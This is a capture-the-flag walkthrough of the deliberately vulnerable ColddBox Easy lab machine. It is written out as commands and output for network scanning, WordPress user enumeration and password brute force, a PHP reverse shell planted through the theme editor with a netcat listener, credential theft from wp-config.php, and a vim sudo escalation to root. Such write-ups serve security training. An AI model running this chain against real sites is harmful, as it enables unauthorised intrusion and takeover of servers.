📦Colddbox

ColddBox Easy is a Wordpress machine with an easy level of difficulty, highly recommended for beginners in the field.

1. Reconnaissance

Scanning the network to find vulnerable machine's IP

nmap -sn 192.168.10.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-17 10:06 IST
Nmap scan report for 192.168.10.1
Host is up (0.0032s latency).
MAC Address: 52:54:00:12:35:00 (QEMU virtual NIC)
Nmap scan report for 192.168.10.2
Host is up (0.0032s latency).
MAC Address: 52:54:00:12:35:00 (QEMU virtual NIC)
Nmap scan report for 192.168.10.3
Host is up (0.0018s latency).
MAC Address: 08:00:27:1C:76:C3 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.10.12
Host is up (0.0014s latency).
MAC Address: 08:00:27:1F:03:A5 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.10.11
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.07 seconds

We find the IP of the vulnerable machine to be 192.168.10.12

2. Scanning

2.1 Nmap

Using nmap to find the open ports and their services

nmap -p- -sV 192.168.10.12
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-17 10:08 IST
Nmap scan report for 192.168.10.12
Host is up (0.37s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
4512/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
MAC Address: 08:00:27:1F:03:A5 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.21 seconds

We find 2 open ports, tcp ports 80 and 4512 with a web server and ssh running respectively

2.2 Directory Enumeration

Brute forcing directories using gobuster to find any hidden directories

gobuster dir -w /usr/share/wordlists/dirb/common.txt --url http://192.168.10.12
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.10.12
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/03/17 10:15:22 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/hidden               (Status: 301) [Size: 315] [--> http://192.168.10.12/hidden/]
/index.php            (Status: 301) [Size: 0] [--> http://192.168.10.12/]         
/server-status        (Status: 403) [Size: 278]                                   
/wp-admin             (Status: 301) [Size: 317] [--> http://192.168.10.12/wp-admin/]
/wp-content           (Status: 301) [Size: 319] [--> http://192.168.10.12/wp-content/]
/wp-includes          (Status: 301) [Size: 320] [--> http://192.168.10.12/wp-includes/]
/xmlrpc.php           (Status: 200) [Size: 42]                                         
                                                                                       
===============================================================
2022/03/17 10:15:27 Finished
===============================================================

We find the directory wp-admin and enumerating further through wappalyzer we can conclude that it is a WordPress site.

3. Initial Foothold

3.1 WPScan

To enumerate the users we use -eu

wpscan -eu --url http://192.168.10.12
_______________________________________________________________

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <===================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] the cold in person
 | Found By: Rss Generator (Passive Detection)

[+] c0ldd
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] hugo
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] philip
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
 
---------------------------------------------------------------------------------

[+] Finished: Thu Mar 17 18:24:39 2022
[+] Requests Done: 16
[+] Cached Requests: 48
[+] Data Sent: 4.363 KB
[+] Data Received: 18.32 KB
[+] Memory used: 179.02 MB
[+] Elapsed time: 00:00:02

We get 4 potential usernames:
- the cold in person
- c0ldd
- hugo
- philip

Brute-forcing password using a word list with -P

wpscan -P /usr/share/wordlists/rockyou.txt --url http://192.168.10.12
_______________________________________________________________

[!] Valid Combinations Found:
 | Username: c0ldd, Password: 9876543210

[!] No WPScan API Token given, as a result vulnerability data has not been output..02%  ETA: ??:??:??
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu Mar 17 18:31:57 2022
[+] Requests Done: 12140
[+] Cached Requests: 18
[+] Data Sent: 5.035 MB
[+] Data Received: 43.984 MB
[+] Memory used: 298.348 MB
[+] Elapsed time: 00:02:55

We get c0ldd : 9876543210

Using these credentials, we can login to the wp-admin page and upload a php reverse shell to Appearance>Editor>template header where url is http://192.168.10.12/wp-admin/theme-editor.php?file=header.php&theme=twentyfifteen
- Using the reverse shell /usr/share/webshells/php/php-reverse-shell.php ,appending it to the header file template and updating it to use port 9001
- Starting nc -lvnp 9001
- Navigating to the headers tab under appearance to trigger the reverse shell.

4. Privilege Escalation

4.1 wp-config.php

Stabilizing the shell using python3 -c 'import pty;pty.spawn("/bin/bash")'
We are the user www-data
Enumerating the current directory we find a wp-config.php file in /var/www/html

cat wp-config.php
<?php
/**
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, and ABSPATH. You can find more information by visiting
 * {@link http://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
 * Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You dont have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'colddbox');

/** MySQL database username */
define('DB_USER', 'c0ldd');

/** MySQL database password */
define('DB_PASSWORD', 'cybersecurity');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

---------------------------------------------------------------------------------

We find the database to be MySQL with cOldd : cybersecurity as login credentials

4.2 Escalation

c0ldd

Using the credentials to login as user c0ldd

su c0ld
Password: cybersecurity

c0ldd@ColddBox-Easy:~$ ls
user.txt

User.txt

c0ldd@ColddBox-Easy:~$ cat user.txt
RmVsaWNpZGFkZXMsIHByaW1lciBuaXZlbCBjb25zZWd1aWRvIQ==

echo 'RmVsaWNpZGFkZXMsIHByaW1lciBuaXZlbCBjb25zZWd1aWRvIQ==' | base64 -d
Felicidades, primer nivel conseguido!

Root

using sudo -l, we find c0ldd can run these processes as root:

c0ldd@ColddBox-Easy:~$ sudo -l
[sudo] password for c0ldd: cyberesecurity

Coincidiendo entradas por defecto para c0ldd en ColddBox-Easy:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

El usuario c0ldd puede ejecutar los siguientes comandos en ColddBox-Easy:
    (root) /usr/bin/vim
    (root) /bin/chmod
    (root) /usr/bin/ftp

Use SUDO privilege escalation on vim from GTFObins : vim -c ':!/bin/sh'

c0ldd@ColddBox-Easy:~$ sudo vim -c ':!/bin/sh'

:!/bin/sh
whoami
root
python3 -c 'import pty;pty.spawn("/bin/bash")'
root@ColddBox-Easy:~

root.txt

root@ColddBox-Easy: cd /root
root@ColddBox-Easy:/root ls
root.txt
root@ColddBox-Easy:/root cat root.txt
wqFGZWxpY2lkYWRlcywgbcOhcXVpbmEgY29tcGxldGFkYSE=
echo 'wqFGZWxpY2lkYWRlcywgbcOhcXVpbmEgY29tcGxldGFkYSE=' | base64 -d
¡Felicidades, máquina completada!

PreviousVulnhub NextCrypto Bank

Last updated 3 years ago